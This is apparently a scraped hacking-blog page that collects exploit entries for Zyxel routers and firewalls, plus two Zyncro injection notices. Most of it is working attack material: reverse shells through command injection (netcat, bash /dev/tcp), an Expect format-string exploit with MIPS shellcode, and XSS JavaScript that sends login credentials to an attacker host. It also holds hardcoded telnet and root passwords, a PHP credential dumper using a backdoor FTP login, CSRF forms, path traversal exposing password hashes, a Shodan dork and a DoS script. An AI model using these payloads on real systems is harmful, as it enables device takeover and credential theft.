# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
# Date: 2017-04-02
# Exploit Author: Fluffy Huffy (trevor Hough)
# Vendor Homepage: www.zyxel.com
# Version: EMG2926 - V1.00(AAQT.4)b8
# Tested on: linux
# CVE : CVE-2017-6884
OS command injection vulnerability was discovered in a commonly used
home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools
specify the nslookup function. A malicious user may exploit numerous
vectors to execute arbitrary commands on the router.
Exploit (Reverse Shell)
https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&
ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p
Exploit (Dump Password File)
Request
GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1
Host: 192.168.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup
Accept-Language: en-US,en;q=0.8
Cookie: csd=9; sysauth=<Clipped>
Connection: close
Response (Clipped)
<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash
admin:$1$<Clipped>:0:0:admin:/:/bin/fail
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863115645
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Reflected XSS on Zyxel login pages
# Date: 10 Apr 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://www.zyxel.com/us/en/
# Version: V4.31
# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
# CVE : 2019-9955
1. Description
==============
Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.
2. Proof of Concept
=============
Host a malicious file JavaScript file named 'z', or any other single character,
locally. The contents of 'z' for the following example are:
-----
$("button").click(function() {
$.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
});
-----
Close the mp_idx variable with "; and Use the getScript functionality of jQuery
to include the malicious file:
Request:
GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Wed, 10 Apr 2019 23:13:39 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 7957
<!DOCTYPE html>
<html>
<head>
<title>Welcome</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8">
<meta http-equiv="pragma" content="no-cache">
<link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" />
<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
<script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
<script language="JavaScript">
var errorNum = 0;
var mp_idx = "";$.getScript('//$LHOST/z');//";
...
When the login form is submitted, the host for the malicious file gets a request
containing the login credentials and target system:
$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
#!/usr/bin/expect -f
#
# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# "We live on a placid island of ignorance in the midst of black seas of
# infinity, and it was not meant that we should voyage far."
# -- H. P. Lovecraft, The Call of Cthulhu
#
# "Multiple improper input validation flaws were identified in some CLI
# commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71,
# USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware
# versions 4.32 through 5.21, VPN series firmware versions 4.30 through
# 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500
# firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware
# version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version
# 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2)
# and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and
# earlier versions, that could allow a local authenticated attacker to
# cause a buffer overflow or a system crash via a crafted payload."
# -- CVE-2022-26531
#
# The zysh binary is a restricted shell that implements the command-line
# interface (CLI) on multiple Zyxel products. This proof-of-concept exploit
# demonstrates how to leverage the format string bugs I have identified in
# the "extension" argument of some zysh commands, to execute arbitrary code
# and escape the restricted shell environment.
#
# - This exploit targets the "ping" zysh command.
# - It overwrites the .got entry of fork() with the shellcode address.
# - The shellcode address is calculated based on a leaked stack address.
# - Hardcoded offsets and values might need some tweaking, see comments.
# - Automation/weaponization for other targets is left as an exercise.
#
# For additional details on my bug hunting journey and on the
# vulnerabilities themselves, you can refer to the official advisory:
# https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt
#
# Usage:
# raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password
# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Leaked stack address: 0x7fe97170
# Shellcode address: 0x7fe9de40
# Base string length: 46
# Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn
#
# *** enjoy your shell! ***
#
# sh-5.1$ uname -snrmp
# Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0
# sh-5.1$ id
# uid=10007(admin) gid=10000(operator) groups=10000(operator)
#
# Tested on:
# Zyxel USG20-VPN with Firmware 5.10
# [other appliances/versions are also likely vulnerable]
#
# change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8
encoding system iso8859-1
# hostile format string to leak stack address via direct parameter access
set offset1 77
set leak [format "AAAA.0x%%%d\$x" $offset1]
# offsets to reach addresses in retloc sled via direct parameter access
set offset2 1801
set offset3 [expr $offset2 + 1]
# difference between leaked stack address and shellcode address
set diff 27856
# retloc sled
# $ mips64-linux-readelf -a zysh | grep JUMP | grep fork
# 112dd558 0000967f R_MIPS_JUMP_SLOT 00000000 fork@GLIBC_2.0
# ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2]
set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024]
# nop sled
# nop-equivalent instruction: xor $t0, $t0, $t0
set nops [string repeat "\x01\x8c\x60\x26" 64]
# shellcode
# https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c
set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c"
# padding to align payload in memory (might need adjusting)
set padding "AAA"
# print header
send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n"
send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n"
# check command line
if { [llength $argv] != 3} {
send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n"
exit 1
}
# get SSH connection parameters
set port "22"
set host [lindex $argv 0]
set user [lindex $argv 1]
set pass [lindex $argv 2]
# inject payload via the TERM environment variable
set env(TERM) $retloc$nops$sc$padding
# connect to target via SSH
log_user 0
spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user
expect {
-nocase "password*" {
send "$pass\r"
}
default {
send_error "error: could not connect to ssh\n"
exit 1
}
}
# leak stack address
expect {
"Router? $" {
send "ping 127.0.0.1 extension $leak\r"
}
default {
send_error "error: could not access zysh prompt\n"
exit 1
}
}
expect {
-re "ping: unknown host AAAA\.(0x.*)\r\n" {
}
default {
send_error "error: could not leak stack address\n"
exit 1
}
}
set leaked $expect_out(1,string)
send_user "Leaked stack address:\t$leaked\n"
# calculate shellcode address
set retval [expr $leaked + $diff]
set retval [format 0x%x $retval]
send_user "Shellcode address:\t$retval\n"
# extract each byte of shellcode address
set b1 [expr ($retval & 0xff000000) >> 24]
set b2 [expr ($retval & 0x00ff0000) >> 16]
set b3 [expr ($retval & 0x0000ff00) >> 8]
set b4 [expr ($retval & 0x000000ff)]
set b1 [format 0x%x $b1]
set b2 [format 0x%x $b2]
set b3 [format 0x%x $b3]
set b4 [format 0x%x $b4]
# calculate numeric arguments for the hostile format string
set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3 "]
send_user "Base string length:\t$base\n"
set n1 [expr ($b4 - $base) % 0x100]
set n2 [expr ($b2 - $b4) % 0x100]
set n3 [expr ($b1 - $b2) % 0x100]
set n4 [expr ($b3 - $b1) % 0x100]
# check for dangerous numeric arguments below 10
if {$n1 < 10} { incr n1 0x100 }
if {$n2 < 10} { incr n2 0x100 }
if {$n3 < 10} { incr n3 0x100 }
if {$n4 < 10} { incr n4 0x100 }
# craft the hostile format string
set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4]
send_user "Hostile format string:\t$exploit\n\n"
# uncomment to debug
# interact +
# exploit target
set prompt "(#|\\\$) $"
expect {
"Router? $" {
send "ping 127.0.0.1 extension $exploit\r"
}
default {
send_error "error: could not access zysh prompt\n"
exit 1
}
}
expect {
"Router? $" {
send_error "error: could not exploit target\n"
exit 1
}
-re $prompt {
send_user "*** enjoy your shell! ***\n"
send "\r"
interact
}
default {
send_error "error: could not exploit target\n"
exit 1
}
}
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2
<html>
<!-- CSRF PoC - generated by Yusuf -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/login/login-page.cgi" method="POST">
<input type="hidden" name="AuthName" value="admin" />
<input type="hidden" name="AuthPassword" value="1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
# Date: 2018-10-28
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Firmware: 1.00(AAPP.0)D7
# Tested on: windows
# Fixed firmware: 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
foreach($open as $u_p){
$bomb = explode(" ",$u_p);
$user = $bomb[0];
$pass = base64_decode($bomb[1]);
if(!empty($pass)){
echo "{$user}:{$pass}<br>";
}else {
continue;
}
}
}else {
echo "pfff";
}
ftp_close($ftp_conn);
?>
# Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting
# Date: 2018-08-21
# Exploit Author: Samet ŞAHİN
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Version: ZyXEL VMG3312-B10B
# Tested on: Mozilla Firefox 61.0.2 & Google Chrome 67.0.3396.99
# Category: Stored XSS
# CVE : N/A
Malicious POST REQUEST :
POST /pages/connectionStatus/connectionStatus-hostEntry.cmd HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/index.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie: SESSION=529313605
Connection: close
Upgrade-Insecure-Requests: 1
action=edit&oldip=192.168.1.36&hosttype=&sessionKey=1997367832&hostname=X<svg onload=alert()>
Vulnerable PAGE :
/pages/connectionStatus/connectionStatus-hostEntry.cmd
Vulnerable PARAMETER :
hostname
Cross Site Scripting PAYLOAD :
X<svg onload=alert()>
#Samet ŞAHİN
# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Date: 2018-11-17
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
# PoC
@modem_gateway = "192.168.1.1" // default address
http://@modem_gateway/../../../../../../../../../../../../etc/passwd
here are the contents :
############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse
parser = argparse.ArgumentParser(
prog="CVE-2022-30525.py",
description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()
banner = (
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
"biA6KSApCg=="
)
def main():
print("\n" + base64.b64decode(banner).decode("utf-8"))
if None in vars(args).values():
print(f"[!] Please enter all parameters !")
parser.print_help()
sys.exit()
if "http" not in args.url:
args.url = "https://" + args.url
args.url += "/ztp/cgi-bin/handler"
exploit(args.url, args.host, args.port)
def exploit(url, host, port):
headers = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Content-Type": "application/json",
}
data = {
"command": "setWanPortSt",
"proto": "dhcp",
"port": "4",
"vlan_tagged": "1",
"vlanid": "5",
"mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
"data": "hi",
}
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
try:
response = requests.post(
url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
)
except (KeyboardInterrupt, requests.exceptions.Timeout):
print("[!] Bye Bye hekcer !")
sys.exit(1)
finally:
try:
print("[!] Can't exploit the target ! Code :", response.status_code)
except:
print("[!] Enjoy your shell !!!")
if __name__ == "__main__":
main()
# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]
# Discovered by: Karn Ganeshen
# CERT VU# 870744
# Vendor Homepage: [www.zyxel.com]
# Version Reported: [Firmware version V100AANC0b5]
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]
*Vulnerability Details*
CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input
Validation - CVE-2015-6018
The diagnostic ping function's PingIPAddr parameter in the ZyXEL
PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user
input. An attacker can execute arbitrary commands as root.
*OS Command Injection PoC*
The underlying services are run as 'root'. It therefore, allows dumping
system password hashes.
*HTTP Request*
POST /diagnostic/diagnostic_general.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101
Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>/diagnostic/diagnostic_general.cgi
Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------
-12062103314079176991367286444
Content-Length: 451
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="InfoDisplay”
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="*PingIPAddr*"
*8.8.8.8; cat /etc/shadow *
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="Submit"
Ping
….
*HTTP Response *
.....
<snipped>
<br class="clearfloat" />
<!-- configuration beginning -->
<div class="headline"><span class="cTitle">General</span></div> <table
width="90%" border="0" align="center" cellpadding="0" cellspacing="0"
class="cfgpadding">
<tr>
<td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100"
readonly="readonly”>
*root:<hash>:15986:0:99999:7:::
lp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::
user:<hash>:16035:0:99999:7:::*
</textarea></td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="0"
cellspacing="0" class="cfgpadding">
<tr>
-----------------------------12062103314079176991367286444--
# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
# Google Dork: n/a
# Date: 2017-10-31
# Exploit Author: Matthew Sheimo
# Vendor Homepage: https://www.zyxel.com/
# Software Link: n/a
# Version: PK5001Z 2.6.20.19
# Tested on: Linux
# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world.
# Linked CVE's: CVE-2016-10401
Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet
username: admin
password: CenturyL1nk
Escalate to root with 'su' and this password.
password: zyad5001
[root:/]# telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
PK5001Z login: admin
Password: CenturyL1nk
$ whoami
admin_404A03Tel
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name: ZyXEL Communications Corp.
# Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
# Date: 2-05-2017
# Exploit Author: ReverseBrain
# Contact: https://www.twitter.com/ReverseBrain
# Vendor Homepage: https://www.zyxel.com
# Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
# Version: 3.40(PE.11)C0
1. Description
Any user who can login into the router can exploit the Local File Inclusion
reading files stored inside the device.
2. Proof of Concept
Login into the router and use the path of a file you want to read as
getpage parameter. For example:
http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd
<?php
/*
Exploit Title : ZYXEL remote configuration editor / Web Server DoS
Date : 23 April 2015
Exploit Author : Koorosh Ghorbani
Site : http://8thbit.net/
Vendor Homepage : http://www.zyxel.com/
Platform : Hardware
Tested On : ZyXEL P-660HN-T1H_IPv6
Firmware Version: 1.02(VLU.0)
--------------------------
Unattended remote access
--------------------------
ZYXEL Embedded Software does not check Cookies And Credentials on POST method so
attackers could changes settings and view pages with post method .
--------------------------
DoS Web Server
--------------------------
sending empty Post to admin pages will crash internal web server and router needs
to hard reset .
*/
$banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n";
print $banner;
function Post($packet,$host)
{
try {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $host);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}catch (Exception $e ){
echo $e->getMessage();
return "" ;
}
}
if(sizeof($argv) < 3) {
print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
exit(1);
}
$host = $argv[1];
$password = urlencode($argv[2]);
$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
$target = "http://$host/cgi-bin/WLAN_General.asp";
if(strlen(Post($packet,$target)) > 0){
print "Seems Changed !";
}else{
print "Humm , No Chance !";
}
//DoS : Post("",$target) ;
?>
# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf ,
https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
HTTP Request :
POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
<!--
# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @alicangonullu
Exploits :
-->
<html><head>
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
</head><body>
<form action="http://10.0.0.1/login.cgi" method="POST">
<input type="text" name="username" id="username" value="admin" /><br />
<input type="text" name="password" id="password" value="1234" /><br />
<input id="loginBtn" onclick="return onlogin()" type='submit'
value='Go!' />
<input type="hidden" name="submit.htm?login.htm" value="Send">
</form>
</body></html>
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
# As a result of the research, one vulnerability identified.
# (Directory Traversal)
# Technical information is provided below step by step.
# [1] - Directory Traversal Vulnerability
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
<https://target/Zyxel/images/eaZy/>
source: https://www.securityfocus.com/bid/49741/info
Zyncro social network is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809
source: https://www.securityfocus.com/bid/49740/info
Zyncro is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Note: To exploit these issues, an attacker must have the ability to create a new group and capture the packets transferred.
An attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Zyncro 3.0.1.20 is vulnerable; other versions may also be affected.
One of the functionalities of Zyncro is the possibility of creating
groups. The name and description of the groups are not correctly
